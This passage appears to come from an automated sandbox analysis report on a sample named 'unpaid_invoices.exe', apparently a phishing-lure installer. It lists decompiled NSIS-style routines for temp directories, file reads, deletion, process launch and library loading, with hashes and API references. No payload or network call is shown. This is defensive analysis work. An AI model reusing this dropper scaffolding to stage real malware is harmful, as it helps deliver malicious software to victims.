              • Opcode Fuzzy Hash: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
              • Instruction Fuzzy Hash: 37F0F671600219A7DB14BB64DD0EF9B376CAB00304F11447AA646F10D0FB7CDB68CB98
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              control_flow_graph 563 405b9f-405bea CreateDirectoryW 564 405bf0-405bfd GetLastError 563->564 565 405bec-405bee 563->565 566 405c17-405c19 564->566 567 405bff-405c13 SetFileSecurityW 564->567 565->566 567->565 568 405c15 GetLastError 567->568 568->566
              C-Code - Quality: 100%
              			E00405B9F(WCHAR* _a4) {
              				struct _SECURITY_ATTRIBUTES _v16;
              				struct _SECURITY_DESCRIPTOR _v36;
              				int _t22;
              				long _t23;
              
              				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
              				_v36.Owner = 0x4083f8;
              				_v36.Group = 0x4083f8;
              				_v36.Sacl = _v36.Sacl & 0x00000000;
              				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
              				_v16.lpSecurityDescriptor =  &_v36;
              				_v36.Revision = 1;
              				_v36.Control = 4;
              				_v36.Dacl = 0x4083e8;
              				_v16.nLength = 0xc;
              				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
              				if(_t22 != 0) {
              					L1:
              					return 0;
              				}
              				_t23 = GetLastError();
              				if(_t23 == 0xb7) {
              					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
              						goto L1;
              					}
              					return GetLastError();
              				}
              				return _t23;
              			}







              APIs
              • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BE2
              • GetLastError.KERNEL32 ref: 00405BF6
              • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405C0B
              • GetLastError.KERNEL32 ref: 00405C15
              Strings
              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BC5
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: ErrorLast$CreateDirectoryFileSecurity
              • String ID: C:\Users\user\AppData\Local\Temp\
              • API String ID: 3449924974-3081826266
              • Opcode ID: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
              • Instruction ID: a4b5b825bdd4266eac6b0ee8a32438dce20ed58698919e53373cd8165130f89a
              • Opcode Fuzzy Hash: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
              • Instruction Fuzzy Hash: 31010871D04219EAEF009BA0C944BEFBFB8EF04314F00403AD545B6191E7799A48CF99
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              control_flow_graph 569 40618d-406199 570 40619a-4061ce GetTickCount GetTempFileNameW 569->570 571 4061d0-4061d2 570->571 572 4061dd-4061df 570->572 571->570 573 4061d4 571->573 574 4061d7-4061da 572->574 573->574
              C-Code - Quality: 100%
              			E0040618D(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
              				intOrPtr _v8;
              				short _v12;
              				short _t12;
              				intOrPtr _t13;
              				signed int _t14;
              				WCHAR* _t17;
              				signed int _t19;
              				signed short _t23;
              				WCHAR* _t26;
              
              				_t26 = _a4;
              				_t23 = 0x64;
              				while(1) {
              					_t12 =  *L"nsa"; // 0x73006e
              					_t23 = _t23 - 1;
              					_v12 = _t12;
              					_t13 =  *0x40a5ac; // 0x61
              					_v8 = _t13;
              					_t14 = GetTickCount();
              					_t19 = 0x1a;
              					_v8 = _v8 + _t14 % _t19;
              					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
              					if(_t17 != 0) {
              						break;
              					}
              					if(_t23 != 0) {
              						continue;
              					} else {
              						 *_t26 =  *_t26 & _t23;
              					}
              					L4:
              					return _t17;
              				}
              				_t17 = _t26;
              				goto L4;
              			}












              APIs
              • GetTickCount.KERNEL32 ref: 004061AB
              • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,00403644,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 004061C6
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: CountFileNameTempTick
              • String ID: C:\Users\user\AppData\Local\Temp\$nsa
              • API String ID: 1716503409-678247507
              • Opcode ID: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
              • Instruction ID: 4618a7cd5e379287717806b061479f75a97df545f28ae60e57938b9bb9b89627
              • Opcode Fuzzy Hash: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
              • Instruction Fuzzy Hash: 4CF09676700214BFDB008F55ED05E9AB7BCEF91710F11803AEE05E7150E6B099548764
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              control_flow_graph 575 403c2b-403c3a 576 403c46-403c4e 575->576 577 403c3c-403c3f CloseHandle 575->577 578 403c50-403c53 CloseHandle 576->578 579 403c5a-403c66 call 403c88 call 405d7a 576->579 577->576 578->579 583 403c6b-403c6c 579->583
              C-Code - Quality: 100%
              			E00403C2B() {
              				void* _t1;
              				void* _t2;
              				void* _t4;
              				signed int _t11;
              
              				_t1 =  *0x40a018; // 0xffffffff
              				if(_t1 != 0xffffffff) {
              					CloseHandle(_t1);
              					 *0x40a018 =  *0x40a018 | 0xffffffff;
              				}
              				_t2 =  *0x40a01c; // 0xffffffff
              				if(_t2 != 0xffffffff) {
              					CloseHandle(_t2);
              					 *0x40a01c =  *0x40a01c | 0xffffffff;
              					_t11 =  *0x40a01c;
              				}
              				E00403C88();
              				_t4 = E00405D7A(_t11, L"C:\\Users\\jones\\AppData\\Local\\Temp\\nsn7D59.tmp\\", 7); // executed
              				return _t4;
              			}







              APIs
              • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,00403B77,?), ref: 00403C3D
              • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,00403B77,?), ref: 00403C51
              Strings
              • C:\Users\user\AppData\Local\Temp\, xrefs: 00403C30
              • C:\Users\user\AppData\Local\Temp\nsn7D59.tmp\, xrefs: 00403C61
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: CloseHandle
              • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsn7D59.tmp\
              • API String ID: 2962429428-954555714
              • Opcode ID: 52edf64d19f6e486756a6566919607a0afda347394bdeaae2c0f5391c2589c01
              • Instruction ID: 4491f7c80fa00ae2087dec4a459748e9e372b7f9a3145cafecdefc003a92e639
              • Opcode Fuzzy Hash: 52edf64d19f6e486756a6566919607a0afda347394bdeaae2c0f5391c2589c01
              • Instruction Fuzzy Hash: F3E0863244471896D1347F7DAE4D9853B195F413327204326F178F20F0C7389AA74A99
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              control_flow_graph 584 403377-403384 585 4033a2-4033ab call 40347f 584->585 586 403386-40339c SetFilePointer 584->586 589 4033b1-4033c4 call 4061e1 585->589 590 403479-40347c 585->590 586->585 593 403469 589->593 594 4033ca-4033dd call 40347f 589->594 596 40346b-40346c 593->596 598 4033e3-4033e6 594->598 599 403477 594->599 596->590 600 403445-40344b 598->600 601 4033e8-4033eb 598->601 599->590 602 403450-403467 ReadFile 600->602 603 40344d 600->603 601->599 604 4033f1 601->604 602->593 605 40346e-403471 602->605 603->602 606 4033f6-403400 604->606 605->599 607 403402 606->607 608 403407-403419 call 4061e1 606->608 607->608 608->593 611 40341b-403422 call 406210 608->611 613 403427-403429 611->613 614 403441-403443 613->614 615 40342b-40343d 613->615 614->596 615->606 616 40343f 615->616 616->599
              C-Code - Quality: 92%
              			E00403377(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
              				long _v8;
              				long _t21;
              				long _t22;
              				void* _t24;
              				long _t26;
              				int _t27;
              				long _t28;
              				void* _t30;
              				long _t31;
              				long _t32;
              				long _t36;
              
              				_t21 = _a4;
              				if(_t21 >= 0) {
              					_t32 = _t21 +  *0x7a8af8;
              					 *0x79f734 = _t32;
              					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
              				}
              				_t22 = E0040347F(4);
              				if(_t22 >= 0) {
              					_t24 = E004061E1( *0x40a01c,  &_a4, 4); // executed
              					if(_t24 == 0) {
              						L18:
              						_push(0xfffffffd);
              						goto L19;
              					} else {
              						 *0x79f734 =  *0x79f734 + 4;
              						_t36 = E0040347F(_a4);
              						if(_t36 < 0) {
              							L21:
              							_t22 = _t36;
              						} else {
              							if(_a12 != 0) {
              								_t26 = _a4;
              								if(_t26 >= _a16) {
              									_t26 = _a16;
              								}
              								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
              								if(_t27 != 0) {
              									_t36 = _v8;
              									 *0x79f734 =  *0x79f734 + _t36;
              									goto L21;
              								} else {
              									goto L18;
              								}
              							} else {
              								if(_a4 <= 0) {
              									goto L21;
              								} else {
              									while(1) {
              										_t28 = _a4;
              										if(_a4 >= 0x4000) {
              											_t28 = 0x4000;
              										}
              										_v8 = _t28;
              										if(E004061E1( *0x40a01c, 0x793730, _t28) == 0) {
              											goto L18;
              										}
              										_t30 = E00406210(_a8, 0x793730, _v8); // executed
              										if(_t30 == 0) {
              											_push(0xfffffffe);
              											L19:
              											_pop(_t22);
              										} else {
              											_t31 = _v8;
              											_a4 = _a4 - _t31;
              											 *0x79f734 =  *0x79f734 + _t31;
              											_t36 = _t36 + _t31;
              											if(_a4 > 0) {
              												continue;
              											} else {
              												goto L21;
              											}
              										}
              										goto L22;
              									}
              									goto L18;
              								}
              							}
              						}
              					}
              				}
              				L22:
              				return _t22;
              			}














              APIs
              • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,?,?,00403323,000000FF,00000000,00000000,?,?), ref: 0040339C
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: FilePointer
              • String ID: 07y
              • API String ID: 973152223-1660179758
              • Opcode ID: 6b22196eac9600fa0887d596689305aa324d5ca70b4b9ec5c244ac4710233144
              • Instruction ID: 558639dd8831905cecc0235a21772d735375f1fafe9af626847c4dd8eee9aa20
              • Opcode Fuzzy Hash: 6b22196eac9600fa0887d596689305aa324d5ca70b4b9ec5c244ac4710233144
              • Instruction Fuzzy Hash: 73319330201218FFDF129FA5ED85D9E3F68EB00359F10803AF905E9190D778DA51DBA9
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              control_flow_graph 617 4015c1-4015d5 call 402da6 call 405fe8 622 401631-401634 617->622 623 4015d7-4015ea call 405f6a 617->623 625 401663-4022f6 call 401423 622->625 626 401636-401655 call 401423 call 40666e SetCurrentDirectoryW 622->626 631 401604-401607 call 405c1c 623->631 632 4015ec-4015ef 623->632 641 402c2a-402c39 625->641 642 40292e-402935 625->642 626->641 644 40165b-40165e 626->644 640 40160c-40160e 631->640 632->631 637 4015f1-4015f8 call 405c39 632->637 637->631 648 4015fa-4015fd call 405b9f 637->648 645 401610-401615 640->645 646 401627-40162f 640->646 642->641 644->641 649 401624 645->649 650 401617-401622 GetFileAttributesW 645->650 646->622 646->623 653 401602 648->653 649->646 650->646 650->649 653->640
              C-Code - Quality: 86%
              			E004015C1(short __ebx, void* __eflags) {
              				void* _t17;
              				int _t23;
              				void* _t25;
              				signed char _t26;
              				short _t28;
              				short _t31;
              				short* _t34;
              				void* _t36;
              
              				_t28 = __ebx;
              				 *(_t36 + 8) = E00402DA6(0xfffffff0);
              				_t17 = E00405FE8(_t16);
              				_t32 = _t17;
              				if(_t17 != __ebx) {
              					do {
              						_t34 = E00405F6A(_t32, 0x5c);
              						_t31 =  *_t34;
              						 *_t34 = _t28;
              						if(_t31 != _t28) {
              							L5:
              							_t25 = E00405C1C( *(_t36 + 8));
              						} else {
              							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
              							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405C39(_t42) == 0) {
              								goto L5;
              							} else {
              								_t25 = E00405B9F( *(_t36 + 8)); // executed
              							}
              						}
              						if(_t25 != _t28) {
              							if(_t25 != 0xb7) {
              								L9:
              								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
              							} else {
              								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
              								if((_t26 & 0x00000010) == 0) {
              									goto L9;
              								}
              							}
              						}
              						 *_t34 = _t31;
              						_t32 = _t34 + 2;
              					} while (_t31 != _t28);
              				}
              				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
              					_push(0xfffffff5);
              					E00401423();
              				} else {
              					E00401423(0xffffffe6);
              					E0040666E(L"C:\\Users\\jones\\AppData\\Local\\Temp",  *(_t36 + 8));
              					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
              					if(_t23 == 0) {
              						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
              					}
              				}
              				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t36 - 4));
              				return 0;
              			}











              APIs
                • Part of subcall function 00405FE8: CharNextW.USER32(?,?,007A4790,?,0040605C,007A4790,007A4790,76CDFAA0,?,76CDF560,00405D9A,?,76CDFAA0,76CDF560,00000000), ref: 00405FF6
                • Part of subcall function 00405FE8: CharNextW.USER32(00000000), ref: 00405FFB
                • Part of subcall function 00405FE8: CharNextW.USER32(00000000), ref: 00406013
              • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                • Part of subcall function 00405B9F: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BE2
              • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp,?,00000000,000000F0), ref: 0040164D
              Strings
              • C:\Users\user\AppData\Local\Temp, xrefs: 00401640
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: CharNext$Directory$AttributesCreateCurrentFile
              • String ID: C:\Users\user\AppData\Local\Temp
              • API String ID: 1892508949-47812868
              • Opcode ID: f9cb4e2508e2448aa58c0f22a173479fd38d1f56d80015943564eb9aeda41760
              • Instruction ID: 957f66bc23545469dbc724fd3d157a479205f5e7ec4e330cdfccc87aa14dd729
              • Opcode Fuzzy Hash: f9cb4e2508e2448aa58c0f22a173479fd38d1f56d80015943564eb9aeda41760
              • Instruction Fuzzy Hash: 3111E231408115EBCF217FA5CD4099E36A0EF15369B28493BFA01B22F1DA3E49829B5E
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 654 405d32-405d43 call 406139 657 405d73 654->657 658 405d45-405d4b 654->658 661 405d75-405d77 657->661 659 405d55 DeleteFileW 658->659 660 405d4d-405d53 RemoveDirectoryW 658->660 662 405d5b-405d5d 659->662 660->662 663 405d64-405d69 662->663 664 405d5f-405d62 662->664 663->657 665 405d6b-405d6d SetFileAttributesW 663->665 664->661 665->657
              C-Code - Quality: 41%
              			E00405D32(void* __eflags, WCHAR* _a4, signed int _a8) {
              				int _t9;
              				long _t13;
              				WCHAR* _t14;
              
              				_t14 = _a4;
              				_t13 = E00406139(_t14);
              				if(_t13 == 0xffffffff) {
              					L8:
              					return 0;
              				}
              				_push(_t14);
              				if((_a8 & 0x00000001) == 0) {
              					_t9 = DeleteFileW();
              				} else {
              					_t9 = RemoveDirectoryW(); // executed
              				}
              				if(_t9 == 0) {
              					if((_a8 & 0x00000004) == 0) {
              						SetFileAttributesW(_t14, _t13);
              					}
              					goto L8;
              				} else {
              					return 1;
              				}
              			}






              APIs
                • Part of subcall function 00406139: GetFileAttributesW.KERNELBASE(?,?,00405D3E,?,?,00000000,00405F14,?,?,?,?), ref: 0040613E
                • Part of subcall function 00406139: SetFileAttributesW.KERNELBASE(?,00000000), ref: 00406152
              • RemoveDirectoryW.KERNELBASE(?,?,?,00000000,00405F14), ref: 00405D4D
              • DeleteFileW.KERNEL32(?,?,?,00000000,00405F14), ref: 00405D55
              • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D6D
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: File$Attributes$DeleteDirectoryRemove
              • String ID:
              • API String ID: 1655745494-0
              • Opcode ID: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
              • Instruction ID: 65d886778d981234f1bc095319bf1530848ff53bfe772b7143d7b60a17f83489
              • Opcode Fuzzy Hash: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
              • Instruction Fuzzy Hash: E1E0E531204EA056C7106B35AD0CF5B2A98EF86314F05893FF592B10D0D77888078AAE
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 666 406ae6-406afe WaitForSingleObject 667 406b0e-406b10 666->667 668 406b00-406b0c call 406a77 WaitForSingleObject 667->668 669 406b12-406b25 GetExitCodeProcess 667->669 668->667
              C-Code - Quality: 100%
              			E00406AE6(void* __ecx, void* _a4) {
              				long _v8;
              				long _t6;
              
              				_t6 = WaitForSingleObject(_a4, 0x64);
              				while(_t6 == 0x102) {
              					E00406A77(0xf);
              					_t6 = WaitForSingleObject(_a4, 0x64);
              				}
              				GetExitCodeProcess(_a4,  &_v8); // executed
              				return _v8;
              			}





              APIs
              • WaitForSingleObject.KERNEL32(?,00000064,00000000,00000000,?,?,00401F9F,?,?,?,?,?,?), ref: 00406AF7
              • WaitForSingleObject.KERNEL32(?,00000064,0000000F,?,?,00401F9F,?,?,?,?,?,?), ref: 00406B0C
              • GetExitCodeProcess.KERNELBASE(?,?), ref: 00406B19
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: ObjectSingleWait$CodeExitProcess
              • String ID:
              • API String ID: 2567322000-0
              • Opcode ID: 283581236024a182d03fca7383c40b0f2a2dbb9aa7d2600e4fb29ca982165da2
              • Instruction ID: 2c972b7a35bd62db52b15041da2731f4b89024a3c017fe3bef96d42d01d66162
              • Opcode Fuzzy Hash: 283581236024a182d03fca7383c40b0f2a2dbb9aa7d2600e4fb29ca982165da2
              • Instruction Fuzzy Hash: 67E09271600218BBEB00AB54DD05E9E7F7EDB44700F110032F601F6190C6B1EE22DAA4
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 53%
              			E00406045(void* __eflags, intOrPtr _a4) {
              				int _t11;
              				signed char* _t12;
              				long _t16;
              				intOrPtr _t18;
              				intOrPtr* _t21;
              				signed int _t23;
              
              				E0040666E(0x7a4790, _a4);
              				_t21 = E00405FE8(0x7a4790);
              				if(_t21 != 0) {
              					E004068F5(_t21);
              					if(( *0x7a8ab8 & 0x00000080) == 0) {
              						L5:
              						_t23 = _t21 - 0x7a4790 >> 1;
              						while(1) {
              							_t11 = lstrlenW(0x7a4790);
              							_push(0x7a4790);
              							if(_t11 <= _t23) {
              								break;
              							}
              							_t12 = E004069A4();
              							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
              								E00405F89(0x7a4790);
              								continue;
              							} else {
              								goto L1;
              							}
              						}
              						E00405F3D();
              						_t16 = GetFileAttributesW(??); // executed
              						return 0 | _t16 != 0xffffffff;
              					}
              					_t18 =  *_t21;
              					if(_t18 == 0 || _t18 == 0x5c) {
              						goto L1;
              					} else {
              						goto L5;
              					}
              				}
              				L1:
              				return 0;
              			}









              APIs
                • Part of subcall function 0040666E: lstrcpynW.KERNEL32(?,?,00000400,004037B6,007A7AA0,NSIS Error), ref: 0040667B
                • Part of subcall function 00405FE8: CharNextW.USER32(?,?,007A4790,?,0040605C,007A4790,007A4790,76CDFAA0,?,76CDF560,00405D9A,?,76CDFAA0,76CDF560,00000000), ref: 00405FF6
                • Part of subcall function 00405FE8: CharNextW.USER32(00000000), ref: 00405FFB
                • Part of subcall function 00405FE8: CharNextW.USER32(00000000), ref: 00406013
              • lstrlenW.KERNEL32(007A4790,00000000,007A4790,007A4790,76CDFAA0,?,76CDF560,00405D9A,?,76CDFAA0,76CDF560,00000000), ref: 0040609E
              • GetFileAttributesW.KERNELBASE(007A4790,007A4790,007A4790,007A4790,007A4790,007A4790,00000000,007A4790,007A4790,76CDFAA0,?,76CDF560,00405D9A,?,76CDFAA0,76CDF560), ref: 004060AE
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: CharNext$AttributesFilelstrcpynlstrlen
              • String ID:
              • API String ID: 3248276644-0
              • Opcode ID: fa3c9235a4b418ee68dfdff8e4277a43b5875b963336551736dc5840a4575c34
              • Instruction ID: 38ed1c6f7611cbdad0e8a1dc3f16fb44af04154f1bcb09577380b12bcb23f66f
              • Opcode Fuzzy Hash: fa3c9235a4b418ee68dfdff8e4277a43b5875b963336551736dc5840a4575c34
              • Instruction Fuzzy Hash: 31F0282A148A5219D622B33A0D05ABF05458EC2354B0B063FFC53B12D1DF7C897385BF
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 69%
              			E00401389(signed int _a4) {
              				intOrPtr* _t6;
              				void* _t8;
              				void* _t10;
              				signed int _t11;
              				void* _t12;
              				signed int _t16;
              				signed int _t17;
              				void* _t18;
              
              				_t17 = _a4;
              				while(_t17 >= 0) {
              					_t6 = _t17 * 0x1c +  *0x7a8ad0;
              					if( *_t6 == 1) {
              						break;
              					}
              					_push(_t6); // executed
              					_t8 = E00401434(); // executed
              					if(_t8 == 0x7fffffff) {
              						return 0x7fffffff;
              					}
              					_t10 = E0040136D(_t8);
              					if(_t10 != 0) {
              						_t11 = _t10 - 1;
              						_t16 = _t17;
              						_t17 = _t11;
              						_t12 = _t11 - _t16;
              					} else {
              						_t12 = _t10 + 1;
              						_t17 = _t17 + 1;
              					}
              					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
              						 *0x7a7a8c =  *0x7a7a8c + _t12;
              						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x7a7a8c, 0x7530,  *0x7a7a74), 0);
              					}
              				}
              				return 0;
              			}











              APIs
              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
              • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: MessageSend
              • String ID:
              • API String ID: 3850602802-0
              • Opcode ID: aa6623dc5ba143c6751f89f60c6741bc3c59239a488c9da53ae18f0a51eeece7
              • Instruction ID: 0d0e525a89db022a3713d7d40a62d3a92fa7a1992dda9c0477917c3d4d329065
              • Opcode Fuzzy Hash: aa6623dc5ba143c6751f89f60c6741bc3c59239a488c9da53ae18f0a51eeece7
              • Instruction Fuzzy Hash: 5901F432624220ABE7094B389D05B2A3698E751315F10C67FF851F79F1EA78CC02DB4C
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E00405C51(WCHAR* _a4) {
              				struct _PROCESS_INFORMATION _v20;
              				int _t7;
              
              				0x7a4f90->cb = 0x44;
              				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x7a4f90,  &_v20); // executed
              				if(_t7 != 0) {
              					CloseHandle(_v20.hThread);
              					return _v20.hProcess;
              				}
              				return _t7;
              			}





              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: CloseCreateHandleProcess
              • String ID:
              • API String ID: 3712363035-0
              • Opcode ID: a96f74c6d97d8fddc601bdb2e7485f3ed7604f934fc57424aef617628e035306
              • Instruction ID: 1fa2a79eb519949bf7d30246b9e4481379e3d274eb9e55713eae969c2627164f
              • Opcode Fuzzy Hash: a96f74c6d97d8fddc601bdb2e7485f3ed7604f934fc57424aef617628e035306
              • Instruction Fuzzy Hash: 6AE0B6F4A00209BFEB00DFA4EE09F7B7AACEB44604F408525BD54F2191D7B9A8148A78
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E00406A3B(signed int _a4) {
              				struct HINSTANCE__* _t5;
              				signed int _t10;
              
              				_t10 = _a4 << 3;
              				_t8 =  *(_t10 + 0x40a410);
              				_t5 = GetModuleHandleA( *(_t10 + 0x40a410));
              				if(_t5 != 0) {
              					L2:
              					return GetProcAddress(_t5,  *(_t10 + 0x40a414));
              				}
              				_t5 = E004069CB(_t8); // executed
              				if(_t5 == 0) {
              					return 0;
              				}
              				goto L2;
              			}





              APIs
              • GetModuleHandleA.KERNEL32(?,00000020,?,00403756,0000000B), ref: 00406A4D
              • GetProcAddress.KERNEL32(00000000,?), ref: 00406A68
                • Part of subcall function 004069CB: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069E2
                • Part of subcall function 004069CB: wsprintfW.USER32 ref: 00406A1D
                • Part of subcall function 004069CB: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A31
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
              • String ID:
              • API String ID: 2547128583-0
              • Opcode ID: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
              • Instruction ID: 8bc6c373ae4a51b79335f269ef4a09a4b84a1385f2c3991dd3566e210a560b2e
              • Opcode Fuzzy Hash: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
              • Instruction Fuzzy Hash: 56E0867660421066D610A6755D48D3773B89BC6710306843EF556F2040DB38DC359A6D
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 68%
              			E0040615E(WCHAR* _a4, long _a8, long _a12) {
              				signed int _t5;
              				void* _t6;
              
              				_t5 = GetFileAttributesW(_a4); // executed
              				asm("sbb ecx, ecx");
              				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
              				return _t6;
              			}





              APIs
              • GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\unpaid_invoices.exe,80000000,00000003), ref: 00406162
              • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406184
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: File$AttributesCreate
              • String ID:
              • API String ID: 415043291-0
              • Opcode ID: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
              • Instruction ID: 0e1b57c135d9ed337dcee0f1630d7a3ffd6699826ab823f4ff8c6da5104765b0
              • Opcode Fuzzy Hash: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
              • Instruction Fuzzy Hash: DCD09E71254201AFEF0D8F20DF16F2E7AA2EB94B04F11952CB682940E1DAB15C15AB19
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E00406139(WCHAR* _a4) {
              				signed char _t3;
              				signed char _t7;
              
              				_t3 = GetFileAttributesW(_a4); // executed
              				_t7 = _t3;
              				if(_t7 != 0xffffffff) {
              					SetFileAttributesW(_a4, _t3 & 0x000000fe); // executed
              				}
              				return _t7;
              			}





              APIs
